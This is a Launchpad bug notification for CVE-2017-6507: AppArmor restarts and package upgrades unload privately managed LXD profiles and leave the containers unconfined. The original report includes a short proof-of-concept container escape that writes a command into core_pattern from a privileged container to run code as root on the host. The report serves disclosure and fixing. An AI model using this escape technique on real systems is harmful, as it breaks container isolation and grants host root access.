** Changed in: apparmor Assignee: Tyler Hicks (tyhicks) => juan serven (juanserven)
-- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1668892 Title: CVE-2017-6507: apparmor service restarts and package upgrades unload privately managed profiles Status in AppArmor: Fix Released Status in AppArmor 2.10 series: Fix Released Status in AppArmor 2.11 series: Fix Released Status in AppArmor 2.9 series: Fix Released Status in apparmor package in Ubuntu: Fix Released Bug description: Restarting the apparmor init script, upstart job, or systemd service has historically removed all loaded profiles unknown to the well-known profile locations. In upstream AppArmor terms, this is /etc/apparmor.d/ but Ubuntu also adds additional locations. This behavior has previously caused a problem where libvirt-managed profiles would be unloaded upon "restarting AppArmor": https://launchpad.net/bugs/702774 Stéphane Graber created this bug report after he noticed that the same behavior was causing similar problems with lxd-manager profiles. In addition, AppArmor distro packaging may trigger an "AppArmor restart" when installing a new version of AppArmor, resulting in the same profile removal problem. This is true for the Debian/Ubuntu packaging. The upstream AppArmor team has decided to remove this functionality from the AppArmor restart logic to prevent a similar issue happening with the next external project that needs to privately manage their own set of AppArmor profiles. === Original Bug Report === Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined. Example: # Create an unprivileged and a privileged container stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1 Creating c1 Starting c1 stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true Creating c2 Starting c2 # Look at their apparmor profiles (expected values) stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce) stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce) # Apply an apparmor upgrade stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages will be upgraded: apparmor 1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 493 kB of archives. After this operation, 8,192 B of additional disk space will be used. Do you want to continue? [Y/n] Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB] Fetched 493 kB in 0s (34.9 MB/s) Preconfiguring packages ... (Reading database ... 221457 files and directories currently installed.) Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ... Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ... Processing triggers for ureadahead (0.100.0-19) ... Setting up apparmor (2.11.0-2ubuntu1) ... Installing new version of config file /etc/apparmor.d/abstractions/X ... Installing new version of config file /etc/apparmor.d/abstractions/authentication ... Installing new version of config file /etc/apparmor.d/abstractions/base ... Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ... Installing new version of config file /etc/apparmor.d/abstractions/gnome ... Installing new version of config file /etc/apparmor.d/abstractions/nameservice ... Installing new version of config file /etc/apparmor.d/abstractions/php5 ... Installing new version of config file /etc/apparmor.d/abstractions/samba ... Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ... Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ... Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ... Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ... Installing new version of config file /etc/apparmor.d/abstractions/user-mail ... update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd Processing triggers for systemd (232-18ubuntu1) ... Processing triggers for man-db (2.7.6.1-1) ... # And look at the now unconfined containers stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current unconfined//&:lxd-c1_<var-lib-lxd>://unconfined stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current unconfined//&:lxd-c2_<var-lib-lxd>://unconfined # The LXD profiles are also entirely gone stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ # And to confirm that apparmor is in fact gone stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash root@c2:~# mount -t proc proc /mnt root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern root@c2:~# sleep 30& [1] 468 root@c2:~# kill -SIGSEGV $! root@c2:~# [1]+ Segmentation fault (core dumped) sleep 30 root@c2:~# exit stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned -rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1668892/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp